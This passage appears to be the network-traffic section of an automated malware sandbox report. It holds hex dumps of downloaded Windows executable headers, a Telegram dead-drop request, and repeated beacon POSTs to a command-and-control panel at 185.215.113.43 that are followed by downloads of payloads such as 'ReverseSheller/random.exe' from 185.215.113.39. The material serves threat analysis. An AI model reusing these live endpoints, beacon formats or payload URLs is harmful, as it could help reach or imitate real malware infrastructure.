00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:28:17 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Fri, 24 Jan 2025 15:07:02 GMTConnection: keep-aliveETag: "6793ac96-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:28:31 GMTContent-Type: application/octet-streamContent-Length: 353280Last-Modified: Sat, 25 Jan 2025 18:47:10 GMTConnection: keep-aliveETag: "679531ae-56400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 56 3d e7 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 50 03 00 00 0a 00 00 00 00 00 00 fe 6d 03 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 62 26 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 6d 03 00 4b 00 00 00 00 80 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 6e 6d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 4e 03 00 00 20 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 80 03 00 00 08 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 53 00 00 00 00 28 04 02 00 00 c0 03 00 00 06 02 00 00 5e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:28:39 GMTContent-Type: application/octet-streamContent-Length: 866906Last-Modified: Fri, 24 Jan 2025 12:37:12 GMTConnection: keep-aliveETag: "67938978-d3a5a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 00 11 00 00 04 00 00 e2 fd 0d 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 6a ed 00 00 00 00 00 00 00 00 00 00 e2 10 0d 00 78 29 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 6a ed 00 00 00 00 10 00 00 ee 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 10 00 00 10 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:28:45 GMTContent-Type: application/octet-streamContent-Length: 15472424Last-Modified: Sat, 25 Jan 2025 14:09:52 GMTConnection: keep-aliveETag: "6794f0b0-ec1728"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0b 00 83 9b 7e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 70 0a 00 00 38 02 00 00 00 00 00 98 7f 0a 00 00 10 00 00 00 90 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 90 0d 00 00 04 00 00 29 f3 ec 00 02 00 40 81 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 70 0b 00 71 00 00 00 00 50 0b 00 ec 0f 00 00 00 b0 0c 00 98 d8 00 00 00 00 00 00 00 00 00 00 c0 f3 eb 00 68 23 00 00 00 a0 0b 00 84 0d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 40 17 00 00 00 70 0a 00 00 18 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 74 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 78 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 ae 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 71 00 00 00 00 70 0b 00 00 02 00 00 00 c0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 18 00 00 00 00 80 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 5d 00 00 00 00 90 0b 00 00 02 00 00 00 c2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 0d 01 00 00 a0 0b 00 00 0e 01 00 00 c4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:29:05 GMTContent-Type: application/octet-streamContent-Length: 1959424Last-Modified: Sun, 26 Jan 2025 13:24:10 GMTConnection: keep-aliveETag: "6796377a-1de600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 97 69 b8 cb d3 08 d6 98 d3 08 d6 98 d3 08 d6 98 6e 47 40 98 d2 08 d6 98 cd 5a 52 98 ce 08 d6 98 cd 5a 43 98 c7 08 d6 98 cd 5a 55 98 b8 08 d6 98 f4 ce ad 98 d6 08 d6 98 d3 08 d7 98 a0 08 d6 98 cd 5a 5c 98 d2 08 d6 98 cd 5a 42 98 d2 08 d6 98 cd 5a 47 98 d2 08 d6 98 52 69 63 68 d3 08 d6 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 a8 2c b1 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 da 02 00 00 3e 01 00 00 00 00 00 00 20 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 86 00 00 04 00 00 f0 69 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5b 80 41 00 6f 00 00 00 00 d0 40 00 9c ad 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 9e 85 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 c0 40 00 00 10 00 00 00 4e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c ad 00 00 00 d0 40 00 00 70 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 80 41 00 00 02 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 90 41 00 00 02 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6e 62 6b 66 73 71 6d 00 f0 1a 00 00 20 6b 00 00 ec 1a 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 66 63 61 6b 75 71 7a 00 10 00 00 00 10 86 00 00 06 00 00 00 be 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 86 00 00 22 00 00 00 c4 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=41c4cebe1dd92a24a1_11141984053211476619
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 35 32 38 37 37 42 30 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB52877B05F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/ReverseSheller/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053875001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 37 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053876001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053877001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/drainisback/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053878001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053879001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/nickjonsong/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053880001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique3/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053881001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/initlosizz198hyjdr/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 38 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053882001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.39
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 35 33 38 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1053883001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/darkfarter/random.exe HTTP/1.1Host: 185.215.113.39
